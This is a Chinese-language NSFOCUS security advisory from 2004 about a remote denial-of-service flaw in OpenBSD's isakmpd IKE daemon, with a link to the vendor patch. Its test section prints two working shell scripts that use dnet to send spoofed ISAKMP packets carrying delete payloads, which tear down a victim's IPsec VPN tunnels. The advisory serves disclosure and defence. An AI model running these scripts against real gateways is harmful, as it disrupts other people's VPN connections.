NSFOCUS绿盟科技

安全研究

安全漏洞

OpenBSD ISAKMPD SA Piggyback删除负载远程拒绝服务漏洞

发布日期：2004-06-08
更新日期：2004-06-15

受影响系统：

OpenBSD OpenBSD 3.5
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0

描述：

BUGTRAQ  ID: 10496

OpenBSD是一款开放源代码操作系统。isakmpd是一款IKE守护程序实现。

OpenBSD's isakmpd实现存在问题，远程攻击者可以利用这个漏洞发送畸形UDP ISAKMP包进行拒绝服务攻击。

如果攻击者发送的畸形UDP ISAKMP包给受此漏洞影响的服务器，并且包含的负载包括：设置新的通道和删除通道数据，isakmpd就会不正确的删除负载和终止关联，从IPSec VPN上删除SA和策略，造成终止网关间的VPN连接等拒绝服务。

<*来源：Thomas Walpuski （thomas@thinknerd.de）

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=108675289410517&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Thomas Walpuski （thomas@thinknerd.de）提供了如下测试方法：

#!/bin/sh
if [ ! $# -eq 3 ]; then
    echo "usage: $0 <faked-src> <victim> <spi>";
    exit;
fi

src=$1; dst=$2
spi=`echo $3 | sed 's/$..$/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \
    $cky_i \
    "\x00\x00\x00\x00\x00\x00\x00\x00" \
    "\x01\x10\x02\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x00\x58" \
    "\x0c\x00\x00\x2c" \
    "\x00\x00\x00\x01" \
    "\x00\x00\x00\x01" \
    "\x00\x00\x00\x20" \
    "\x01\x01\x00\x01" \
    "\x00\x00\x00\x18" \
    "\x00\x01\x00\x00" \
    "\x80\x01\x00\x05" \
    "\x80\x02\x00\x02" \
    "\x80\x03\x00\x01" \
    "\x80\x04\x00\x02" \
    "\x00\x00\x00\x10" \
    "\x00\x00\x00\x01" \
    "\x03\x04\x00\x01" \
    $spi |
    dnet udp sport 500 dport 500 |
    dnet ip proto udp src $src dst $dst |
    dnet send

-------------------------------------------------------------------

#!/bin/sh

if [ ! $# -eq 3 ]; then
    echo "usage: $0 fake_src victim spi";
    exit;
fi

src=$1; dst=$2
spi=`echo $3 | sed 's/$..$/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \
    $cky_i \
    "\x00\x00\x00\x00\x00\x00\x00\x00" \
    "\x08\x10\x05\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x00\x5c" \
    "\x01\x00\x00\x04" \
    "\x0c\x00\x00\x2c" \
    "\x00\x00\x00\x01" \
    "\x00\x00\x00\x01" \
    "\x00\x00\x00\x20" \
    "\x01\x01\x00\x01" \
    "\x00\x00\x00\x18" \
    "\x00\x01\x00\x00" \
    "\x80\x01\x00\x05" \
    "\x80\x02\x00\x02" \
    "\x80\x03\x00\x01" \
    "\x80\x04\x00\x02" \
    "\x00\x00\x00\x10" \
    "\x00\x00\x00\x01" \
    "\x03\x04\x00\x01" \
    $spi |
    dnet udp sport 500 dport 500 |
    dnet ip proto udp src $src dst $dst |
    dnet send

建议：

厂商补丁：

OpenBSD
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

OpenBSD Patch 012_isakmpd.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.5/common/012_isakmpd.patch

浏览次数：3164
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客